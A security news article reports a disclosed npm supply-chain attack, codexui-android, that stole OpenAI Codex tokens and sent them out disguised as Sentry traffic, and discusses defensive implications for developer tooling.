Aikido Security researcher Charlie Eriksen this week disclosed a supply-chain attack against developers using OpenAI Codex that ran for approximately one month before detection. The attack vector was a functioning npm package named codexui-android, which had reached 29,000 weekly downloads on its own and was distributed alongside two Android applications with combined install counts of more than 60,000. The package did real work and was useful enough that developer adoption looked organic. The malicious functionality was added in a later version after the package had built trust.
The payload extracted access tokens, refresh tokens, ID tokens, and account identifiers from the OpenAI Codex authentication file at ~/.codex/auth.json on the developer”s machine, then exfiltrated the credentials to attacker-controlled infrastructure disguised as a Sentry endpoint. The detection-evasion technique was straightforward: traffic to “sentry”-named endpoints is widely whitelisted in developer environments, and the volume of legitimate Sentry traffic on a typical developer machine is high enough to mask the malicious uploads.
The materially worse-than-typical part of the disclosure is the persistence model. OpenAI”s refresh tokens do not expire. Once exfiltrated, a Codex refresh token enables indefinite account impersonation. Token rotation, the standard mitigation for this class of theft, does not apply because there is no expiration window to wait out. Developers whose tokens were stolen need to actively revoke the credential through OpenAI”s revocation flow, and need to assume that any work done under the compromised account during the active window has been exposed.
The attack pattern is novel and is worth understanding because it is going to recur. The traditional supply-chain attack on a package manager has been typosquatting or namespace confusion — register a malicious package that looks like a legitimate one, harvest the credentials of developers who fat-finger the install. The defense was a combination of allow-listing, naming-convention enforcement, and detection at the registry layer. None of those defenses work against the codexui-android pattern, because the package was a real, functioning, legitimate-looking package for weeks before it became malicious. The trust was built. The malice was introduced once the trust was in place.
For security teams in 2026, three implications are operational. First, the npm ecosystem and adjacent package managers need continuous behavioral monitoring of installed packages, not just point-in-time vetting at install. Behavioral changes between versions are the signal. Second, developer-machine secret hygiene — including the assumption that long-lived tokens are stealable — has to drive how AI developer tools are designed. Third, the AI-tooling ecosystem is now a primary supply-chain target. The codexui-android attack is the second confirmed June 1 supply-chain hit on AI developer infrastructure, alongside the Miasma Red Hat npm attack disclosed the same day. The pattern is converging fast.
Watch for: OpenAI”s response on refresh-token lifetime architecture, comparable patterns targeting Anthropic and Google AI developer tooling, and whether npm itself implements behavioral-anomaly detection at the package level.
Reporting based on The Hacker News coverage and Aikido Security”s disclosure.
